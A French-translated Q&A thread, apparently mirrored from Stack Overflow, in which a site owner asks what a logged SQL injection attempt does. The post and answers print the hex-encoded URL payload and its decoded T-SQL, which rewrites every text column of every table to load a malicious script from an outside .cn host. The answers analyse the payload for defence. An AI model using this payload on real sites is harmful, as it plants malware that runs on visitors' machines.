1. Accueil
  2. Question et réponse
  3. Tentative d'attaque par injection SQL - qu'essaient-ils de faire?

Tentative d'attaque par injection SQL - qu'essaient-ils de faire?

2008-10-14 5 views
21

J'ai un site Web public qui a reçu un certain nombre d'attaques par injection SQL au cours des dernières semaines. J'utilise exclusivement paramétrées procédures stockées, donc je crois qu'il n'y a pas eu avec succès les attaques, mais un journal récente a montré une technique intéressante:Tentative d'attaque par injection SQL - qu'essaient-ils de faire?

sauts de ligne supplémentaires pour plus de clarté

 
http://www.mydummysite.uk/mypage.asp?l_surname=Z;DECLARE%[email protected]%20CHAR(4000);SET 
@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263 
686172283430303029204445434C415245205461626C655F437572736F7220435552534F 
5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F 
626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E69 
6420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F72 
20622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970 
653D31363729204F50454E205461626C655F437572736F72204645544348204E45585420 
46524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528 
404046455443485F5354415455533D302920424547494E20657865632827757064617465 
205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C 
736372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F6373 
7273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D2077 
6865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C73 
6372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F637372 
73732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E455854 
2046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E442043 
4C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F43 
7572736F72 AS CHAR(4000));EXEC(@S);&_X="

Quelqu'un peut-il faire la lumière sur ce que "CAST et EXEC" tentent de faire?

Source

2008-10-14 Guy

Répondre

30

est le SQL décodé ci-dessous qu'ils essayaient de pousser:

DECLARE @T varchar(255), 
     @C varchar(4000) 

DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name 
FROM sysobjects a,syscolumns b 
WHERE a.id=b.id 
AND a.xtype='u' 
AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) 

OPEN Table_Cursor FETCH NEXT 
FROM Table_Cursor INTO @T,@C 
WHILE(@@FETCH_STATUS=0) 
    BEGIN exec('update ['[email protected]+'] SET ['[email protected]+']=''"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--''+['[email protected]+'] WHERE '[email protected]+' NOT like ''%"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--''') 
    FETCH NEXT FROM Table_Cursor INTO @T,@C 
END CLOSE Table_Cursor 

DEALLOCATE Table_Cursor

Source

2008-10-14 09:45:46 Ishmaeel

+1

Comment avez-vous dé-codé cela? – Guy

+0

Googling "hex à la chaîne" m'a donné ceci: http://www.string-functions.com/hex-string.aspx. Après cela, c'était une simple question de jolies impressions SQL. – Ishmaeel

+0

* Smacks head * Merci beaucoup pour cette réponse rapide. – Guy

11

Le code, lorsque déchiffré de six pans en caractères, semble passer par toutes vos tables de base de données, sélectionnez toutes les colonnes de texte/type char, et à la fin de chaque valeur de ce type ajouter une exécution de script malveillant de http://www2.s800qn.cn/csrss/w.js. Maintenant, si dans votre site Web, vous avez au moins un endroit où vous n'échappez pas aux données de texte extraites de votre base de données, les utilisateurs de votre site auront ce script malveillant exécuté sur leurs machines.

Source

2008-10-14 09:48:49 DzinX

4

Je pense que nous avons déjà eu cette attaque auparavant. Il essaie d'insérer une balise <script> dans chaque champ de chaque table de la base de données.

Source

2008-10-14 09:49:17 jammus

1

L'algorithme Python la plus simple à déchiffrer le code hexadécimal est ceci:

text = "4445434C415245204054207661726368617228323535292C404..." 

def getText(): 
    for i in range(0, len(text), 2): 
     byte = text[i:i+2] 
     char = int(byte, 16) 
     toPrint = chr(char) 
     yield toPrint 

print ''.join(getText())

Source

2008-10-14 09:50:10 DzinX

7

Exécuter ce, par exemple dans une base MySQL:

select CAST(0x44...72 AS CHAR(4000)) as a;

et vous saurez. Ishmaeel a collé le code.

Ceci est un ver SQL Server, pas un atatck ciblé.

Source

2008-10-14 09:51:42 Tometzky

3

C'est un script adware-dropper, construit pour encombrer votre base de données avec <script> tags qui apparaissent sur vos pages. Il est codé parce que la plupart des serveurs exploseraient si vous essayiez de pousser cette ordure par l'URL.

La plupart des choses comme ceci sont des attaques aléatoires en ce qu'elles touchent n'importe quoi avec une chaîne de requête mais il peut s'agir d'une attaque ciblée. Testez votre site pour vous assurer qu'il ne laisse pas exécuter de SQL à partir de Querystrings. Juste en utilisant des requêtes paramétrées devrait vous couvrir.

Source

2008-10-14 09:55:15 Oli

+0

Oui, j'encode aussi mes champs QUERYSTRING et FORM, supprime les équerres etc etc et les autres données d'hygiène habituelles! – Guy

 Questions connexes

  • Aucun problème connexe^_^